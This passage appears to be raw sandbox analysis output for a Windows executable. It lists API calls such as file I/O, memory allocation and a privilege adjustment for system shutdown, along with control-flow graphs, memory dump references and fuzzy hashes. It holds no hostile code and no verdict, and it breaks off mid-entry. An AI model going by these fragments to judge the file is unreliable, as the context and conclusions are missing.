                                                                            • Instruction Fuzzy Hash: 3C214975A002089BDB01EFE1C9429DEB7B9EB48304F10457BE901B73C2DA7CAF058AA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 311 406f00-406f53 SetErrorMode call 403414 LoadLibraryA
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00008000), ref: 00406F0A
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00406F54,?,00000000,00406F72,?,00008000), ref: 00406F39
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLibraryLoadMode
                                                                            • String ID:
                                                                            • API String ID: 2987862817-0
                                                                            • Opcode ID: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
                                                                            • Instruction ID: 61c75ae37e4b7eabf140846b9e9d3e90831ba1beb5fed57b889ca027c52d2016
                                                                            • Opcode Fuzzy Hash: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
                                                                            • Instruction Fuzzy Hash: 49F08270614704BEDB029FB69C6282BBBFCE749B0475348B6F904A26D2E53C5D208568
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 321 4075cc-4075f1 SetFilePointer 322 407603-407608 321->322 323 4075f3-4075fa GetLastError 321->323 323->322 324 4075fc-4075fe call 4073ec 323->324 324->322
                                                                            APIs
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 004075EB
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 004075F3
                                                                              • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,021203AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$FilePointer
                                                                            • String ID:
                                                                            • API String ID: 1156039329-0
                                                                            • Opcode ID: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
                                                                            • Instruction ID: cda5b13584bb414d1d7c0d7cef5a43535e1b929ad68122291bf656bee98e9d77
                                                                            • Opcode Fuzzy Hash: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
                                                                            • Instruction Fuzzy Hash: A0E092766081016FD601D55EC881B9B33DCDFC5365F00453ABA54EB2D1D675AC0087B6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 315 40758c-4075aa ReadFile 316 4075c3-4075ca 315->316 317 4075ac-4075b0 315->317 318 4075b2-4075ba GetLastError 317->318 319 4075bc-4075be call 4073ec 317->319 318->316 318->319 319->316
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004075A3
                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004075B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
                                                                            • Instruction ID: 6d0e635579d8ef6deec62af0acb898b5effba2491802df9b0589d4017bc118ea
                                                                            • Opcode Fuzzy Hash: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
                                                                            • Instruction Fuzzy Hash: 4FE012B1A181147AEB24965A9CC5FAB6BDCCBC5314F14847BF904DB282D678DC04877B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 326 407524-407545 SetFilePointer 327 407557-407559 326->327 328 407547-40754e GetLastError 326->328 328->327 329 407550-407552 call 4073ec 328->329 329->327
                                                                            APIs
                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 0040753B
                                                                            • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00407547
                                                                              • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,021203AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$FilePointer
                                                                            • String ID:
                                                                            • API String ID: 1156039329-0
                                                                            • Opcode ID: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
                                                                            • Instruction ID: cd7afd6369a15af5fc7b0f7528e30ca6696358c0ea2e6c45e94f6e0b4d50a73a
                                                                            • Opcode Fuzzy Hash: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
                                                                            • Instruction Fuzzy Hash: 0EE04FB1600210AFEB10EEB98C81B9672DC9F48364F048576EA14DF2C6D274DC00C766
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 331 401430-40143d 332 401446-40144c 331->332 333 40143f-401444 331->333 334 401452-40146a VirtualAlloc 332->334 333->334 335 40146c-40147a call 4012e4 334->335 336 40148f-401492 334->336 335->336 339 40147c-40148d VirtualFree 335->339 339->336
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 2087232378-0
                                                                            • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                            • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                            • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                            • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00405306), ref: 004051EF
                                                                              • Part of subcall function 00404C2C: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404C49
                                                                              • Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                            • String ID:
                                                                            • API String ID: 1658689577-0
                                                                            • Opcode ID: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
                                                                            • Instruction ID: c760dbbb10683706500036a577470844d35ac6ab0c013c9c95042e4326961867
                                                                            • Opcode Fuzzy Hash: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
                                                                            • Instruction Fuzzy Hash: 3B313D75E00119ABCB00EF95C8C19EEB779FF84304F158977E815BB285E739AE058B98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
                                                                            • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                            • Opcode Fuzzy Hash: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
                                                                            • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
                                                                            • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                            • Opcode Fuzzy Hash: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
                                                                            • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00406984,?,?,?,?,00000000,?,00406999,00406CC7,00000000,00406D0C,?,?,?), ref: 00406967
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
                                                                            • Instruction ID: a5d31a369ac9c1460ce21b6bb4ed2cb839aeaeb50f5f76e03c39097c5263300d
                                                                            • Opcode Fuzzy Hash: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
                                                                            • Instruction Fuzzy Hash: A9E065712043047FD701EA629C52959B7ACDB89708B924476B501A6682D5785E108568
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040763F
                                                                              • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,021203AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastWrite
                                                                            • String ID:
                                                                            • API String ID: 442123175-0
                                                                            • Opcode ID: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
                                                                            • Instruction ID: 68b513bd5595dc6b38f1d245c0222f257f742b1e6f06676187839ef0e6677733
                                                                            • Opcode Fuzzy Hash: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
                                                                            • Instruction Fuzzy Hash: 93E01A727081106BEB10E65EDCC0EABA7DCDFC5764F04547BBA08EB291D674AC049676
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0040904B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061), ref: 00407203
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage
                                                                            • String ID:
                                                                            • API String ID: 1306739567-0
                                                                            • Opcode ID: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
                                                                            • Instruction ID: 095b59eb22c1ada42cfe979e419102ec0d22498c88dfceb067fba30b4837873c
                                                                            • Opcode Fuzzy Hash: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
                                                                            • Instruction Fuzzy Hash: 8DE0D8A0B8830125F22514544C87B77110E53C0700F50847EB710ED3D3D6BEA90641AF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetEndOfFile.KERNEL32(?,02138000,00409F6B,00000000), ref: 00407613
                                                                              • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,021203AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 734332943-0
                                                                            • Opcode ID: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
                                                                            • Instruction ID: 5d9383f6f08d3e81a9fa52c4aba0b6319cc61be016c813106cdb36ce464f185a
                                                                            • Opcode Fuzzy Hash: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
                                                                            • Instruction Fuzzy Hash: 39C04CB1A0450047DB40A6BE99C1A0662DC5A483157045576BA08DB297D679E8009665
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
                                                                            • Instruction ID: 754ecbd0d3eeca534395493226652c0236480d823d7569c9efe771d01927bad3
                                                                            • Opcode Fuzzy Hash: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
                                                                            • Instruction Fuzzy Hash: 97B09B7661C2015DE705D6D5745193863F4D7C47103A1457BF104D25C0D57CD4144518
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
                                                                            • Instruction ID: 7c61e226393e4972c06343dd54fa3db727d2c771c967085a02b7622724de7152
                                                                            • Opcode Fuzzy Hash: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
                                                                            • Instruction Fuzzy Hash: BAA022A8C00002B2CE00E2F08080A3C23282A8C3003C00AAA322EB20C0C03CC000822A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CharPrevA.USER32(?,?,004068CC,?,004065A9,?,?,00406CE7,00000000,00406D0C,?,?,?,?,00000000,00000000), ref: 004068D2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrev
                                                                            • String ID:
                                                                            • API String ID: 122130370-0
                                                                            • Opcode ID: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
                                                                            • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                            • Opcode Fuzzy Hash: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407E8C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
                                                                            • Instruction ID: 2791b199587b26d82634b85145401aad68464bde91e43c5b6ac1b5c6de7462a2
                                                                            • Opcode Fuzzy Hash: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
                                                                            • Instruction Fuzzy Hash: 7A1172716042449BDB00EE19C881B5B3794AF84359F1484BAF958AB2C6DB38EC04CBAA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                            • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                            • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                            • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
                                                                            • Instruction ID: 0172511661962fd54a17c381567595eb1d39a1afdb2a9088c563811225ee2893
                                                                            • Opcode Fuzzy Hash: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
                                                                            • Instruction Fuzzy Hash: FDD05E81B00A6017D215E2BE498864696C85F88745B08847AFA84E73D1D67CAC008399
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E82), ref: 00407DBB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
                                                                            • Instruction ID: 99ab645fda39969175de1cb99313e8e2edaeef7f3c7532f72142fb74a6686f70
                                                                            • Opcode Fuzzy Hash: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
                                                                            • Instruction Fuzzy Hash: 0AD0E9B17553055BDB90EEB95CC5B123BD87B48601F5044B66904EB29AE674E8109614
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 0040937B
                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00409381
                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040939A
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C1
                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C6
                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004093D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
